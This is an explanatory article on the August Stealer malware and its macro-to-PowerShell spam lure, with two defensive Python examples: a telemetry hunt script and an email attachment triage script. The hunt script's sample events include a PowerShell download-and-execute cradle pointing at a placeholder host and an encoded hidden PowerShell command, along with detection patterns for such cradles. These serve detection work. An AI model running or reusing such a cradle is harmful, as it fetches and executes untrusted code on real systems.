Retail Support Systems are Targeted by August Stealer

Extremely sensitive and private information is the target of August Stealer, a malicious fileless threat that is distributed with the help of misleading spam emails. If this malware manages to slither in without being detected, it can silently steal information and make it available to cyber criminals. Needless to say, virtual privacy and financial security are on the line here. Unfortunately, this infection is silent, and it even employs another tool called “Confuser” to ensure that it remains out of sight. What does that mean? It means that this malware has a good chance of serving its purpose without the victim ever realizing it. Who is the target of this malware? That depends on the malicious party using the threat (we discuss how multiple parties can be involved further in this report), but it appears that companies dealing with customer support, including retail companies and manufacturers, are the main targets. That being said, everyone needs to be cautious, because deleting August Stealer is much more difficult than protecting the system against it.

August Stealer is distributed using a highly clandestine technique. This fileless malware is downloaded using PowerShell when the target enables macros. Basically, the infection cannot just execute itself on the computer, and while it could be downloaded and executed by other infections that might be active on the system, the target’s participation is usually required. So, how does it all work? The actor behind August Stealer creates a bogus email message that is specifically aimed at the customer support of a company. Let’s say the cyber criminals are targeting a major online goods store. To attract the attention of support staff, the subject line is written to look legitimate, such as “Need HELP with online order.” The message describes a fake problem that the bogus “customer” is dealing with, and a file attachment is appended to it. The message might indicate that the file explains the problem better, but emails with suspicious attachments should never be opened. They should be removed instead! If an email gateway security system is not set up and the target opens the file, they are asked to enable macros/content, and that should NOT be done. If macros are enabled, the macro launches PowerShell, which downloads August Stealer automatically, and there is only so much time to delete this threat before it starts stealing information.
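The chain described above (macro enabled, PowerShell launched, payload fetched) leaves a very recognizable trace in process-creation telemetry, and that is where a defender can catch it before any data leaves. The following is an added example, not code from the original article or from any vendor research: it runs a small rule set over a few constructed, simplified process-creation records (the field names mirror Sysmon Event ID 1; the pipe-separated record format is an assumption made for the example) and flags an Office application spawning a script host, plus the usual download-cradle switches on the command line.

```python
"""Hunt for the macro-to-PowerShell chain in process-creation telemetry.

Added example. The records below are constructed, simplified field=value pairs
joined with '|', standing in for Sysmon Event ID 1 / Windows 4688 exports.
A production version would read the real XML/JSON events; the logic is the same.
"""
import ntpath
import re

# Office applications that should never be the parent of a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and LOLBins commonly launched by malicious macros.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Command-line indicators of a download-and-execute cradle.
ARG_INDICATORS = [
    ("download cradle", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)),
    ("in-memory execution", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("encoded command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("hidden window / no profile / bypass", re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
]

# Constructed sample telemetry (not real events from any incident).
SAMPLE_EVENTS = [
    "EventID=1|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "EventID=1|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe Get-ChildItem C:\\Users",
    "EventID=1|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|Image=C:\\Windows\\splwow64.exe|CommandLine=splwow64.exe 12288",
    "EventID=1|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"",
]


def parse_event(line: str) -> dict:
    """Split a record into fields; only the first '=' separates key from value."""
    event = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        event[key] = value
    return event


def classify(event: dict) -> tuple:
    """Return (severity, reasons). ntpath handles Windows paths on any host OS."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    office_spawn = parent in OFFICE_PARENTS and image in SCRIPT_HOSTS
    if office_spawn:
        reasons.append(f"office app {parent} spawned {image}")
    for label, pattern in ARG_INDICATORS:
        if pattern.search(cmd):
            reasons.append(label)
    if office_spawn:
        severity = "high"          # Word should never start a script host
    elif len(reasons) >= 2:
        severity = "medium"        # cradle-like switches without an Office parent
    elif reasons:
        severity = "low"
    else:
        severity = None
    return severity, reasons


def hunt(lines) -> list:
    """Run classify() over raw records and keep only the ones that fire."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        severity, reasons = classify(event)
        if severity:
            alerts.append({"severity": severity, "reasons": reasons,
                           "image": ntpath.basename(event.get("Image", "")),
                           "command": event.get("CommandLine", "")})
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(f"[{alert['severity'].upper()}] {alert['image']}: {'; '.join(alert['reasons'])}")
```

The parent/child rule is the one worth alerting on regardless of arguments: an encoded or obfuscated command line can be rewritten by the attacker, but a macro still has to start something, and Word starting PowerShell has almost no legitimate business use.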

The malicious August Stealer can steal Bitcoin wallet data stored in wallet.dat files, remote connection data stored in .RDP files, and information from instant messaging applications (Pidgin, Psi, and Windows Live), email clients (Mozilla Thunderbird and MS Outlook 2013 and older), and FTP clients (CoreFTP, CuteFTP, FileZilla, SmartFTP, Total Commander, and WinSCP). It can also steal data saved by these web browsers: Amigo, Bromium, Chromium, CoolNovo Browser, Comodo, Coowon, Dooble, Google Chrome, IceDragon, Mail.Ru Browser, Mozilla Firefox, Opera, RockMelt Browser, SRWare Iron, Torch Browser, U Browser, Vivaldi Browser, and Yandex. The cookies stored by these browsers, for example, can help cyber criminals obtain passwords and other user-related information. August Stealer can also steal personal files, including documents. Ultimately, if one does not remove August Stealer in time, it can enable major identity theft. Confuser is used for anti-debugging, anti-decompiling, anti-memory-dumping, and other obfuscation techniques, which helps ensure that the victim does not realize they need to delete this malicious infection.

Anyone who has 100 USD can purchase August Stealer, because this fileless infection is sold on the dark web, and it has been available for purchase since at least 2016. Unfortunately, it is unknown how many different parties might be using the stealer to gather information illegally. It is known that at least one other variant of this malware exists, and it is called “Vega Stealer.” Overall, this kind of malware is out there, and more variants could exist, which is why it is extremely important to ensure that security measures are taken. As mentioned before, email gateway security systems can be helpful. Employing legitimate and trustworthy anti-malware software can be extremely helpful too. Of course, it is most important that targets themselves become more cautious. Keeping an eye on suspicious subject lines, email addresses, and email messages can help targets avoid a malware invasion.
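The email gateway is the control that stops this lure before anyone is asked to enable macros. An added example follows, not code from the original article or from any gateway product: a content-based attachment triage that quarantines Office documents carrying a VBA project, judging by file contents rather than extension, so a macro document renamed from .docm to .docx is still caught. The sample documents are constructed in memory (a minimal OOXML zip, and two byte strings carrying the legacy OLE header plus the directory-name markers a VBA project leaves behind); the legacy-format check is a marker heuristic rather than a full CFB parser. Both are assumptions of the example.

```python
"""Gateway-side triage of Office attachments: quarantine anything carrying VBA.

Added example. The sample documents are constructed in memory and are not real
August Stealer lures. Detection keys on file contents, not the extension.
"""
import io
import os
import zipfile

MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam"}
OFFICE_EXTENSIONS = MACRO_EXTENSIONS | {".doc", ".dot", ".xls", ".xlt", ".ppt",
                                        ".docx", ".dotx", ".xlsx", ".pptx"}
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML packages are zip files
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"    # legacy binary Office (CFB) header
# CFB directory entries store stream names as UTF-16LE; these names appear only
# when a VBA project is stored in the file. Heuristic, cheap, dependency-free.
OLE_VBA_MARKERS = ["_VBA_PROJECT".encode("utf-16-le"), "Macros".encode("utf-16-le")]


def ooxml_has_vba(data: bytes) -> bool:
    """In OOXML the VBA project is the vbaProject.bin part, also declared in [Content_Types].xml."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                name = info.filename.lower()
                if name.endswith("vbaproject.bin"):
                    return True
                if name == "[content_types].xml" and b"vnd.ms-office.vbaProject" in zf.read(info):
                    return True
    except zipfile.BadZipFile:
        pass
    return False


def has_vba_macros(data: bytes) -> bool:
    """Dispatch on the real container format, whatever the file is called."""
    if data.startswith(ZIP_MAGIC):
        return ooxml_has_vba(data)
    if data.startswith(OLE_MAGIC):
        return any(marker in data for marker in OLE_VBA_MARKERS)
    return False


def triage_attachment(filename: str, data: bytes) -> tuple:
    """Return (verdict, reason); verdict is 'quarantine' or 'allow'."""
    ext = os.path.splitext(filename.lower())[1]
    if ext in MACRO_EXTENSIONS:
        return "quarantine", "macro-enabled Office extension " + ext
    if has_vba_macros(data):
        return "quarantine", "VBA project found inside " + (ext or "attachment")
    if ext in OFFICE_EXTENSIONS:
        return "allow", "Office document without VBA"
    return "allow", "not an Office document"


def build_ooxml(with_vba: bool) -> bytes:
    """Constructed minimal OOXML package, optionally carrying a dummy VBA part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        types = '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        if with_vba:
            types += '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        zf.writestr("[Content_Types].xml", types + "</Types>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\x00" * 64)   # placeholder bytes, not real VBA
    return buf.getvalue()


# Constructed legacy-format blobs: correct magic plus directory-name markers only.
FAKE_OLE_WITH_VBA = (OLE_MAGIC + b"\x00" * 504 + "Macros".encode("utf-16-le")
                     + b"\x00" * 8 + "_VBA_PROJECT".encode("utf-16-le"))
FAKE_OLE_CLEAN = OLE_MAGIC + b"\x00" * 504 + "WordDocument".encode("utf-16-le")

SAMPLE_ATTACHMENTS = [
    ("order_problem.docm", build_ooxml(True)),
    ("order_problem.docx", build_ooxml(True)),   # macro doc renamed to look harmless
    ("invoice.docx", build_ooxml(False)),
    ("complaint.doc", FAKE_OLE_WITH_VBA),
    ("receipt.doc", FAKE_OLE_CLEAN),
    ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
]

if __name__ == "__main__":
    for name, blob in SAMPLE_ATTACHMENTS:
        verdict, reason = triage_attachment(name, blob)
        print(f"{verdict:10} {name:20} {reason}")
```

For a support mailbox that genuinely receives documents from strangers, quarantining every macro-bearing file is the realistic policy: a customer describing an order problem has no reason to send code, and the file can still be released by hand after a look inside.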

In non-techie terms:

August Stealer is an incredibly malicious and stealthy fileless infection that is being used to make way for malicious parties to steal all kinds of personal information. To slither in, the infection usually uses a misleading spam email with a malicious Word document attachment which, once opened and its macros enabled, launches PowerShell to download and run the threat. It then silently records passwords and usernames, and steals all kinds of files that store personal data. If this data falls into the wrong hands, the victim can experience major data theft and virtual impersonation. Since the stealer appears to be targeted at bigger companies at this point, the data that is available to cyber criminals is much more vast, and, in turn, many more victims could emerge from that (for example, if the infection steals files that store personal customer information). Needless to say, appropriate security measures must be taken to ensure that the threat does not invade, but if it does, removing August Stealer is crucial, and the sooner that is done, the better.